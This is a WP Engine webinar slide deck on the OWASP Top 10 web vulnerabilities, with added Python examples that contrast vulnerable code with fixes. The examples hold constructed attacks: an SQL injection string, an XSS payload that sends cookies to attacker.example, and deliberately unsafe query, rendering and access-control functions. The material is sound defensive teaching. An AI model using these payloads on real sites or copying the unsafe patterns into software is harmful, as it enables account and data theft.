
Security Webinar: Harden the Heart of Your WordPress Site


Discover the OWASP Top 10 web vulnerabilities and how to mitigate the risk associated with each for your website.

Register to watch on-demand webinar here: https://wpengine.com/resources/security-webinar-harden-heart-wordpress-site/



  1. #wpewebinar, February 15, 2017
  2. Ask questions as we go: use the "Questions" pane throughout the webinar. We'll answer as many questions as we can after the presentation. Slides and recording will be made available shortly after the webinar.
  3. What you'll learn:
     • What is OWASP?
     • What are the OWASP Top Ten?
     • How each might affect your website
     • How to mitigate risks for each vulnerability
     • Q&A
  4. Speakers:
     • Justin Dailey, Security Engineer, WP Engine: background in hardware and digital electronics; sports enthusiast; loves all things outdoors
     • Will West, Security Architect, WP Engine: made a Gatling gun with a sonar sensor; 6'8" tall; does not play basketball
  5. OWASP
  6. The OWASP Top Ten
  7. OWASP Top 10 (2013 edition):
     • A1 Injection
     • A2 Weak Authentication and Session Management
     • A3 Cross Site Scripting (XSS)
     • A4 Insecure Direct Object References
     • A5 Security Misconfiguration
     • A6 Sensitive Data Exposure
     • A7 Missing Function Level Access Control
     • A8 Cross Site Request Forgery
     • A9 Using Components with Known Vulnerabilities
     • A10 Unvalidated Redirects and Forwards
  8. Poll: Are you currently doing anything to secure your website against these Top 10 threats?
  9-10. A1 Injection
     Description
     • Different types: SQL, LDAP, ORM, XML, XPath, code injection, command injection, buffer overflows
     • Execution of unintended commands
     • Unauthorized data access
     Protections
     • Enforce input type and length
     • Ensure special characters are escaped
     • Validate all input fields and use an input validation whitelist
     • Avoid dynamic queries or commands; use parameterized queries (prepared statements) so data is never parsed as part of the statement
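A worked example of the A1 protections, added here and not part of the webinar: a lookup built by string concatenation beside the same query parameterized, a whitelist for a sort column (identifiers cannot be bound as parameters, so they must be validated instead), and a type-and-length check on a numeric ID. The in-memory table, its rows and the attacker string are constructed for the demo.

```python
"""Added example (not from the webinar): SQL injection through a dynamic
query, the same query parameterised, a whitelist for an identifier, and a
type/length check.  Table, rows and attacker input are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: a tiny posts table with one private row.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER, title TEXT, status TEXT)")
    db.executemany("INSERT INTO posts VALUES (?, ?, ?)", [
        (1, "Hello world", "publish"),
        (2, "Draft: unreleased pricing", "private"),
    ])
    return db


def find_public_vulnerable(db: sqlite3.Connection, title: str) -> list:
    # Dynamic query: untrusted `title` is concatenated into the SQL text,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = ("SELECT id, title FROM posts WHERE status = 'publish' "
           "AND title = '%s'" % title)
    return db.execute(sql).fetchall()


def find_public_safe(db: sqlite3.Connection, title: str) -> list:
    # Parameterised query: the driver sends `title` as data, never as SQL.
    sql = "SELECT id, title FROM posts WHERE status = 'publish' AND title = ?"
    return db.execute(sql, (title,)).fetchall()


ALLOWED_SORT_COLUMNS = {"id", "title"}   # whitelist for an identifier


def find_public_sorted(db: sqlite3.Connection, order_by: str) -> list:
    # Column names cannot be bound as parameters; refuse anything not on the list.
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unexpected sort column: %r" % order_by)
    return db.execute(
        "SELECT id, title FROM posts WHERE status = 'publish' ORDER BY " + order_by
    ).fetchall()


def parse_post_id(raw: str) -> int:
    # Enforce type and length before the value goes anywhere near a query.
    if not (raw.isdigit() and len(raw) <= 10):
        raise ValueError("post id must be a short decimal integer")
    return int(raw)


# Constructed attacker input: closes the string literal, ORs in a true
# condition, and comments out the trailing quote.
ATTACK = "x' OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print(find_public_vulnerable(db, ATTACK))   # returns the private row too
    print(find_public_safe(db, ATTACK))         # []
    print(find_public_sorted(db, "title"))
```

In WordPress the parameterized form is `$wpdb->prepare()` with `%s`/`%d` placeholders; the whitelist step still applies to anything that becomes an identifier or keyword, such as an ORDER BY column or a table name.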
  11-12. A2 Weak Authentication and Session Management
     Description
     • Attacks take advantage of improper authentication or session management practices
     • Leads to access to sensitive information such as passwords, keys, or tokens
     • Execution of privileged application functions
     Protections
     • Follow standard and recommended practices for user management and authentication
     • Perform user and role validation on all actions
     • Use secure session cookie flags (Secure, HttpOnly)
     • Always use CSRF tokens with forms
  13-14. A3 Cross Site Scripting (XSS)
     Description
     • An application places data from untrusted sources into site content without performing proper validation and/or escaping
     • Allows client-side script execution in the victim's browser
     • Can lead to compromised credentials and sessions, site defacement, and redirection to malicious sites
     Protections
     • Positive input validation using the correct character set
     • Sanitize input
     • Output-encode all user data upon rendering, using the encoding for the context it lands in (HTML body, attribute, JavaScript, URL)
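A worked example of the A3 protections, added here and not part of the webinar: an untrusted comment rendered into HTML with and without output encoding, plus a positive (whitelist) check on a display name. The payloads, the markup template and the `executes_script` demo check are constructed for this example.

```python
"""Added example, not from the webinar: rendering an untrusted comment into
HTML with and without output encoding.  Payloads and markup are constructed
for this demo."""
import html
import re


def render_comment_vulnerable(author: str, body: str) -> str:
    # Untrusted data dropped straight into markup: the browser runs it.
    return '<div class="comment" data-author="%s"><p>%s</p></div>' % (author, body)


def render_comment_safe(author: str, body: str) -> str:
    # Encode for the context the data lands in.  html.escape(quote=True)
    # turns & < > " ' into entities, which is safe in element text and inside
    # a double-quoted attribute.  A JavaScript or URL context would need its
    # own encoder instead of this one.
    return '<div class="comment" data-author="%s"><p>%s</p></div>' % (
        html.escape(author, quote=True), html.escape(body, quote=True))


# Positive validation for a display name: a known-good character set and length.
DISPLAY_NAME = re.compile(r"[A-Za-z0-9 ._-]{1,40}")


def valid_display_name(name: str) -> bool:
    return DISPLAY_NAME.fullmatch(name) is not None


# Constructed payloads: one for element text, one that breaks out of an attribute.
BODY_PAYLOAD = ("<script>new Image().src='https://attacker.example/?c='"
                "+document.cookie</script>")
ATTR_PAYLOAD = 'x" onmouseover="alert(1)'


def executes_script(markup: str) -> bool:
    # Crude demo check: does the markup contain a live <script> tag or an
    # inline event-handler attribute?
    return "<script" in markup or re.search(r'\son[a-z]+="', markup) is not None


if __name__ == "__main__":
    print(render_comment_vulnerable(ATTR_PAYLOAD, BODY_PAYLOAD))
    print(render_comment_safe(ATTR_PAYLOAD, BODY_PAYLOAD))
```

Note that stripping `<script>` from input on the way in would not have stopped the attribute payload; the encoding at output time is what makes both renderings inert. In WordPress the equivalents are `esc_html()` for element text and `esc_attr()` for attribute values.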
  15-16. A4 Insecure Direct Object References
     Description
     • A reference to an internal object such as a file, directory, or database key is exposed
     • Leads to unauthorized data access directly or by manipulating the reference
     Protections
     • Ensure access control checks are performed whenever a direct object reference is used
     • Use reference maps (indirect, per-user references) instead of direct references such as database IDs
  17-18. A5 Security Misconfiguration
     Description
     • Insecure server or application configurations that allow unintended access to data or application functions
     • Can be a result of naive configurations, default configurations, or outdated software
     Protections
     • A repeatable and testable hardening process covering development, QA, and production
     • Regular update and patching processes
     • Periodic scans and audits
  19-20. A6 Sensitive Data Exposure
     Description
     • Improper protection and/or encryption of sensitive data such as personally identifiable information, payment methods, and credentials
     • Exposure can occur at rest or in transit
     • Can lead to fraud, PR nightmares, and further exploitation
     Protections
     • Encrypt all sensitive data at rest and in transit
     • Avoid storing sensitive data at all costs
     • Use standard and modern cryptography and hashing algorithms (for passwords, a salted, slow hash rather than a bare MD5 or SHA-1 digest)
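A worked example of the last A6 protection, added here and not part of the webinar: credentials stored with a salted, memory-hard hash (scrypt from Python's standard library) and verified in constant time, beside the bare MD5 digest that shows what exposure looks like. The record format, the cost parameters and the sample passwords are this example's own assumptions, not a tuned recommendation for any particular host.

```python
"""Added example (not from the webinar): storing credentials with a modern,
salted, memory-hard hash instead of a bare fast digest, and comparing in
constant time.  Record format and cost parameters are assumptions."""
import base64
import hashlib
import hmac
import os

# Assumed cost parameters: 128 * N * r bytes of memory per hash (16 MiB here).
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def hash_password(password: str) -> str:
    salt = os.urandom(16)                         # fresh random salt per record
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    # Self-describing record so the parameters can be raised later without
    # breaking existing entries.
    return "scrypt$%d$%d$%d$%s$%s" % (
        SCRYPT_N, SCRYPT_R, SCRYPT_P,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"))


def verify_password(password: str, record: str) -> bool:
    try:
        algo, n, r, p, salt_b64, digest_b64 = record.split("$")
        if algo != "scrypt":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        n, r, p = int(n), int(r), int(p)
    except (ValueError, TypeError):
        return False                              # malformed record, never a match
    actual = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=n, r=r, p=p, dklen=len(expected))
    # Constant-time comparison so timing does not leak how many bytes matched.
    return hmac.compare_digest(actual, expected)


def legacy_md5(password: str) -> str:
    # The exposure case: unsalted and fast, so identical passwords hash
    # identically and precomputed tables or GPUs recover them quickly.
    return hashlib.md5(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    rec = hash_password("correct horse battery staple")
    print(rec)
    print(verify_password("correct horse battery staple", rec))   # True
    print(legacy_md5("password"), legacy_md5("password"))          # same digest twice
```

Encryption in transit is the other half of the slide and is a deployment setting rather than code: serve every page, including the login form and admin area, over HTTPS so the cookie flags in the A2 slide actually hold.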
  21-22. A7 Missing Function Level Access Control
     Description
     • Authorization is checked on the front end (UI, for example by hiding a menu item) but not properly enforced on the application functions themselves
     • Verification must be performed on all functions at all levels
     • Allows unauthorized access to functions and data
     Protections
     • Perform validations client side AND server side; only the server-side check is a security control
     • Use explicit grants, deny by default
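A worked example covering both the A4 slide (reference maps instead of direct IDs) and the A7 slide (deny-by-default checks inside the function, not only in the UI), added here and not part of the webinar. The roles, capability grants, users and invoice store are constructed for the demo; the `requires` decorator and `is_denied` helper are this example's own.

```python
"""Added example (not from the webinar): server-side, deny-by-default
function-level authorisation plus an indirect reference map so database keys
are never exposed or guessable.  Roles, grants, users and data are constructed."""
import functools
import secrets

# Constructed role -> capability grants.  Anything not listed is denied.
GRANTS = {
    "administrator": {"edit_posts", "delete_users", "view_invoice"},
    "subscriber": {"view_invoice"},
}


class Forbidden(Exception):
    pass


class User:
    def __init__(self, name: str, role: str):
        self.name, self.role = name, role
        self._refmap = {}            # per-user: opaque token -> real object id

    def can(self, capability: str) -> bool:
        return capability in GRANTS.get(self.role, set())


def requires(capability: str):
    """Enforce the check in the function itself, whatever the UI showed."""
    def deco(fn):
        @functools.wraps(fn)
        def wrapper(user, *args, **kwargs):
            if not user.can(capability):
                raise Forbidden("%s lacks %s" % (user.name, capability))
            return fn(user, *args, **kwargs)
        return wrapper
    return deco


@requires("delete_users")
def delete_user(actor: User, target: str) -> str:
    return "deleted %s" % target


# Constructed document store: invoice id -> (owner, contents).
INVOICES = {1001: ("alice", "alice's invoice"), 1002: ("bob", "bob's invoice")}


def view_invoice_vulnerable(user: User, inv_id: int) -> str:
    # A4 as the slide describes it: direct key, no ownership check, so any
    # logged-in user who changes the number in the URL reads anyone's invoice.
    return INVOICES[inv_id][1]


def list_my_invoices(user: User) -> list:
    """Hand out random tokens for the caller's own objects instead of keys."""
    tokens = []
    for inv_id, (owner, _) in INVOICES.items():
        if owner == user.name:
            token = secrets.token_urlsafe(16)
            user._refmap[token] = inv_id
            tokens.append(token)
    return tokens


@requires("view_invoice")
def view_invoice(user: User, token: str) -> str:
    inv_id = user._refmap.get(token)        # unknown token: nothing to map to
    if inv_id is None:
        raise Forbidden("no such reference")
    owner, contents = INVOICES[inv_id]
    if owner != user.name:                  # re-check ownership on the real object
        raise Forbidden("not the owner")
    return contents


def is_denied(fn, *args) -> bool:
    """Demo helper: True if the call is rejected by the access check."""
    try:
        fn(*args)
        return False
    except Forbidden:
        return True


if __name__ == "__main__":
    alice = User("alice", "subscriber")
    print(view_invoice_vulnerable(alice, 1002))      # bob's invoice leaks
    print(view_invoice(alice, list_my_invoices(alice)[0]))
    print(is_denied(delete_user, alice, "bob"))      # True
```

The map is per user and per session here, so a token copied out of one user's page is meaningless for another; the ownership re-check on the real object stays in place regardless, since the map is a convenience on top of access control, not a substitute for it.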
  23-24. A8 Cross Site Request Forgery
     Description
     • An attack forcing a logged-in victim's browser to send a forged HTTP request, which the browser sends together with the victim's session cookies
     • Requests target vulnerable sites that do not perform proper request validation
     Protections
     • Include an unpredictable CSRF token in each state-changing HTTP request and verify it server side
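A worked example serving both the A2 slide (secure session cookie flags) and the A8 slide (an unpredictable CSRF token in each request), added here and not part of the webinar. It issues a session cookie with `Secure`, `HttpOnly` and `SameSite`, derives a per-session CSRF token from a server secret, and rejects a state-changing POST whose token does not match. The server secret, the cookie and form dictionaries, and the `handle_post` handler are constructed for the demo; the derived-token scheme is one common way to do it, not the only one.

```python
"""Added example (not from the webinar): a session cookie with secure flags
and a CSRF token bound to that session.  The server secret and the request
handling are constructed for this demo."""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)      # assumption: per-deployment secret


def new_session_id() -> str:
    return secrets.token_urlsafe(32)         # 256 bits from the OS CSPRNG


def session_cookie_header(session_id: str) -> str:
    # Secure: only sent over HTTPS.  HttpOnly: not readable by page script,
    # which limits what an XSS can steal.  SameSite=Lax: not sent on
    # cross-site POSTs, a second line of defence against CSRF.
    return "Set-Cookie: sid=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % session_id


def csrf_token(session_id: str) -> str:
    # HMAC of the session id under a server secret: unpredictable to anyone
    # without the cookie, and nothing extra to store per form.
    return hmac.new(SERVER_SECRET, session_id.encode("ascii"),
                    hashlib.sha256).hexdigest()


def hidden_field(session_id: str) -> str:
    # Embedded in every form the site renders for this session.
    return '<input type="hidden" name="_csrf" value="%s">' % csrf_token(session_id)


def handle_post(cookies: dict, form: dict) -> str:
    """Reject any state-changing request whose token does not match the session."""
    sid = cookies.get("sid")
    if not sid:
        return "401 not logged in"
    sent = form.get("_csrf", "")
    if not hmac.compare_digest(sent.encode("utf-8"),
                               csrf_token(sid).encode("ascii")):
        return "403 CSRF check failed"
    return "200 password changed for session %s" % sid[:8]


if __name__ == "__main__":
    sid = new_session_id()
    print(session_cookie_header(sid))
    print(hidden_field(sid))
    # A forged cross-site form carries the cookie (browser adds it) but not the token.
    print(handle_post({"sid": sid}, {"new_password": "hunter2"}))
    print(handle_post({"sid": sid}, {"new_password": "hunter2", "_csrf": csrf_token(sid)}))
```

In WordPress the same pattern is `wp_nonce_field()` in the form and `check_admin_referer()` or `wp_verify_nonce()` in the handler.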
  25-26. A9 Using Components with Known Vulnerabilities
     Description
     • Known vulnerabilities in the libraries and frameworks you use can be exploited with readily available tools
     • Can allow attackers to bypass security measures through exploitation
     Protections
     • Maintain an inventory of the components and versions used by your application
     • Monitor the security of these components via public notifications such as vulnerability mailing lists
     • Establish and follow policies dictating which software components are acceptable to use
  27-28. A10 Unvalidated Redirects and Forwards
     Description
     • Use of redirects and forwards where untrusted data determines the destination page
     • Redirection can be exploited to send users to malicious sites performing phishing or malware distribution
     Protections
     • Avoid redirects and forwards if possible
     • If they are used, do not let dynamic parameters decide the destination; if a parameter must be honoured, validate it against your own host and reject everything else
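A worked example of the A10 protection, added here and not part of the webinar: a post-login `redirect_to` parameter validated against the site's own host, handling the forms attackers actually use (protocol-relative `//evil.com`, backslashes, credentials in the authority, `javascript:` URLs). The site host, the parameter name and the sample URLs are constructed for the demo.

```python
"""Added example (not from the webinar): validating a redirect target so
untrusted input can never choose the destination host.  SITE and the test
URLs are constructed for this demo."""
from urllib.parse import urljoin, urlsplit

SITE = "https://example.com"        # assumption: the only allowed destination origin


def safe_redirect_target(redirect_to: str, fallback: str = "/") -> str:
    """Return `redirect_to` only if it resolves to a path on SITE, else `fallback`."""
    if not redirect_to:
        return fallback
    # Browsers treat backslashes as slashes but urlsplit does not, so
    # normalise them first or "/\evil.com" parses as a harmless path.
    candidate = redirect_to.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return fallback                  # javascript:, data:, and friends
    # Resolve relative to our origin, then check what the browser would see.
    resolved = urlsplit(urljoin(SITE + "/", candidate))
    if resolved.scheme != "https" or resolved.netloc != urlsplit(SITE).netloc:
        # Catches "//evil.com/x", "https://evil.com", "https://example.com@evil.com",
        # "https://example.com.evil.com" and a downgrade to plain http.
        return fallback
    # Rebuild from path and query only, so nothing attacker-controlled sets the host.
    return resolved.path + ("?" + resolved.query if resolved.query else "")


if __name__ == "__main__":
    for url in ["/wp-admin/", "//evil.com/phish", "/\\evil.com",
                "https://example.com@evil.com/", "javascript:alert(1)"]:
        print("%-32s -> %s" % (url, safe_redirect_target(url)))
```

In WordPress, `wp_safe_redirect()` performs this kind of host check (via `wp_validate_redirect()` and the `allowed_redirect_hosts` filter) and should be preferred over `wp_redirect()` whenever the target comes from a request parameter.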
  29. Questions and answers. Slides and recording will be made available shortly after the webinar.
  30. Resources:
     • 8 Key Security Questions Your Hosting Company Should Be Able to Answer
     • OWASP Top 10 2013 Project
     • OWASP Vulnerable Web Applications Directory Project
     • Live interview with David Endler of Manifest on web security
     • 15 Ways to Harden the Security of Your WordPress Site
     • Recorded webinar: Today's Website Security Threat Landscape (featuring Tony Perez, Sucuri)
  31. Next up... Register now: http://wpeng.in/ email. Wednesday, Feb 22, 11:00 a.m. CST / 12:00 p.m. EST / 9:00 a.m. PST / 5:00 p.m. UTC/GMT
  32. Help us improve
  33. Thank you. #wpewebinar @wpengine
